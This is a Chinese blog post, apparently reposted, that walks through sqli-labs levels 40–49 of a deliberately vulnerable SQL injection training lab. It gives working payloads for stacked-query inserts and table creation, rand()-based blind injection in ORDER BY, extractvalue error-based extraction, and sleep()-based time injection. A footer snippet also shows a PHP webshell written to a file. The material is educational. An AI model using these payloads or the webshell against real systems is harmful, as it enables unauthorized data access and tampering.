【20171103中】sqli-libs Less 40-49

最新推荐文章于 2022-12-31 20:08:48 发布
最新推荐文章于 2022-12-31 20:08:48 发布
阅读量101 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/heijuelou/p/7779830.html
版权

 

  Less 40:

  题目:

  分析:此题可以实现sql的叠加,即注入的时候可以构成sql1;sql2...执行。

  payload: http://192.168.162.135/sqli-libs/Less-40/?id=1');insert into users(id,username,password) value('100','hello','world')--+

  效果:

  Less 41:

  分析:和Less40类似,payload: http://192.168.162.135/sqli-libs/Less-41/?id=1;insert into users(id,username,password) value('41','hello41','world41')--+

  Less 42:

  题目:

  分析:这题同样是可以叠加注入

  payload: login_user=admin&login_password=1";insert into users(id,username,password) value('42','h42','w42')#&mysubmit=Login

  Less 43 - 45:和Less42类似

  login_user=a&login_password=b');create table less43 like users#&mysubmit=Login

  login_user=a&login_password=b';create table less44 like users#&mysubmit=Login

  login_user=a&login_password=b');create table less45 like users#&mysubmit=Login

  Less 46:

  题目:

  分析:此处是输入sort参数,sql中有效部分是order by XXX,XXX一般构成 表中的列序号 + 升降序,例如:select * from users order by 1 desc;将users表按照第一列降序排序。

    所以这里可以在XXX处注入。用到的是rand()函数,rand()返回0~1的随机数,但是传入整数时,会一直返回一个浮点数,固定不变。所以我们构造rand(ascii(left(database(),1))=115)进行判断数据库名称的第一个字符是不是115,rand参数为一个表达 式,为真,则会是rand(1),否则rand(0),通过页面显示可以看出自己的判断是否正确。

  payload: http://192.168.162.135/sqli-libs/Less-46/?sort=rand(ascii(left(database(),1))=115)

  效果:

  

  Less 47:

  题目:类似Less 46,但是无回现,可通过错误日志显示,因此 payload: http://192.168.162.135/sqli-libs/Less-47/?sort=1' and extractvalue(1, concat(0x7e, database()))--+

  Less 48: 

  题目:类似Less 46,payload: http://192.168.162.135/sqli-libs/Less-48/?sort=rand(ascii(left(database(),1))=115)

  Less 49:

  题目:类似Less 46,无回现,无错误日志,通过时间注入法,payload: http://192.168.162.135/sqli-libs/Less-49/?sort=1' and (if(ascii(left(database(),1))=115, sleep(4), 0))--+

转载于:https://www.cnblogs.com/heijuelou/p/7779830.html

weixin_30872337
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-libs------less1-less8
qq_46116117的博客
01-05 2398
sqli-libs sql注入思路 判读是否存在注入–判断注入类型–猜解字段数–查看输出字段位置–尝试爆出数据 获取数据库名–获取表名–获取列名–获取数据 less–1 页面让我们输入一个id值 我们用get的请求方式输入看看 测试这里是否有注入点 ?id=1' 出现报错情况,说明这里有注入点 判断注入类型 ?id=1' and 1=1--+ 为正常页面 ?id=1' and 1=2--+ 页面显示不正常 则为,字符型注入 猜测他的查询语句为 select *from * where ID=
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-libs
weixin_30293079的博客
12-02 128
这是抄袭你们 铃兰师姐总结的,尽管她很不情愿。 (现在只是第八关,相信她会努力的,一定会做完,我也会随时在这个上面更新的,这个是在本地搭建的,想要这个的可以找你们铃兰师姐要啊!!!) less-1: 1、获取当前数据库名 http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select database())--+ ...
sqli-libs(Less5~Less7)
henghengzhao_的博客
10-16 740
去做了几道ctf题,发现自己还是太菜了,于是还是回来老老实实先把最基本的靶场打完吧接下来就不写的那么详细了,贴图不会那么多了,只记录关键的代码,以及相关的知识点。
sqli-libs(7)
weixin_30566149的博客
05-22 285
导出文件GET字符型注入 0x01介绍 导出到文件就是可以将查询结果导出到一个文件,如常见的将一句话木马导出到一个php文件sqlmap也有导出一句话和一个文件上传的页面 常用的语句是: select "<?php @eval($_POST['giantbranch']);?>" into outfile "XXX\test.php" ,当这里要获取到网站的在系统的具...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-lib64关闯关笔记学习资料.zip
08-22
sqli-labs-1-65閫氬叧鏁欑▼share(by sm0nk).md》这个文件很可能包含了作者sm0nk在完成sqli-lib64所有65关的过程所记录的笔记和技巧。通过阅读这份文档,你可以了解到每个关卡的关键思路、解题方法以及可能遇到...
sqli-libs(3)
weixin_30438813的博客
05-18 131
今天我们来讲解 sqli-libs(3) 有括号的单引号报错 首先我们来查看加入'看报错了 在加‘’ 没报错 证明 存在注入 然后我们看加入’的报错回显的是什么 和我们的sqli-libs(1)的报错对比一下 发现多了一个)证明他的语句变成了 id=那我们可以根据此特性构造闭合语句 我们查看源代码 发现确实是多了 括号的 我们此时在构造id=1')闭合前面的括号和引号 而后面的...
sqli-libs系列
qq_43511094的博客
12-31 1575
sqllibs information_schema的表实际上是视图,而不是基本表,因此,文件系统上没有与之相关的文件 information_schema库常用的表 schemate 这个表就很强,可以显示所有数据库的信息,注意,是数据库,不是表,show databases 就是从这个表获取数据,schema_name就
sqli-libs 1-5
鲨鱼辣椒的博客
05-19 349
目录 sqlmap 判断是否有注入点 获取数据库名 获取数据库的表名 获取表的列名 获取列的字段 sqlmap 判断是否有注入点 sqlmap.py -u http://127.0.0.1/sqli/sqli-labs-master/Less-1/?id=1 看报错可知,首先是GET请求,然后有四种注入类型依次分别是布尔型盲注、报错注入、时间型盲注、和联合注入 获取数据库sqlmap.py -u http://127.0.0.1/sqli/sqli-labs.
sqli-libs(1-10关)
weixin_44216796的博客
11-29 467
urlib库 urllib库是Python一个最基本的网络请求库。可以模拟浏览器的行为,向指定的服务器发送一个请求 ,并可以保存服务器返回的数据。 urlopen函数 在Python3的urllib库,所有和网络请求相关的万法,都被集到urllib.request 模块下面了,以先来看下urlopen函数基本的使用: from urllib import request resp = request.urlopen(‘http://www.baidu.com’) #ctrl+b 查看参数 print(r
SQLI-libs 1-8
qq_43871200的博客
03-20 317
前几天看到同学在群里发的sqli-libs教程,想着在家闲着也是无聊,不如搞点事情,于是按照教程下载了phpstudy和sqli-libs,学习一波 第一二三关没什么好说的,总结 查库名:select schema_name from information_schema.schemata 查表名:select table_name from information_schema.tables ...
sqli下载及安装(sqli-libs)-图文详解+phpStudy配置
wzhua的博客
09-12 3846
sqli下载及安装-图文详解 (配置phpStudy)+phpStudy下载链接 配置
sqli-libs(1-6)闯关笔记(纯手注)
qq_40671478的博客
08-12 906
SQL/Less-1 单引号字符串型回显注入 1.判断闭合字符 http://182.92.220.201/Less-1/?id=1' #报错信息use near ''1'' LIMIT 0,1' at line 1 http://182.92.220.201/Less-1/?id=1' and 1=1 -- = #正常 #注意:注释符--后面要有空格 http://182.92.220.201/Less-1/?id=1' and 1=2 -- = #异常 http://182.92.220.201/L
sqli-libs less1(union 字符注入)
weixin_42728957的博客
12-10 251
打开后,提示输入id并赋值 1、寻找注入点 输入?id=1返回数据,输入?id=1’报错,说明存在sql注入漏洞 根据报错信息,猜想输入参数的值被放到一对单引号之间。 猜测后台源码存在类似于如下的数据库查询语句(可查看后台源码证实猜测): SELECT * FROM users WHERE id='$id' LIMIT 0,1 2、order by 查询该数据表的字段数量 输入?id=1’ order by 3 --+ 正常; 输入?id=1’ order by 4 --+ 报错,说明该数据表
sqli-libs Page-1解题笔记
weixin_46262057的博客
03-29 4219
开始说明: 本次文章所需要的技术借鉴了B站大佬crowsec录制视频时所用的技术,旨在记录所学成果,同时我也会附上自己的总结心得,还望诸位大佬多多指正。本次所需工具为hackbar;我这里使用的靶场为buu靶场,所以无环境搭建过程。 第一关 作为一个刚接触的sql注入的小白来讲,构造payload语句简直要了老命,十分难记。不过没有办法,多多练习。 看第一关的名字,single quote:单引号; 我们先打卡harkbar或者直接用url传参,?id=1 --+ 看看效果; 这里为啥用–+呢,因为我们
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值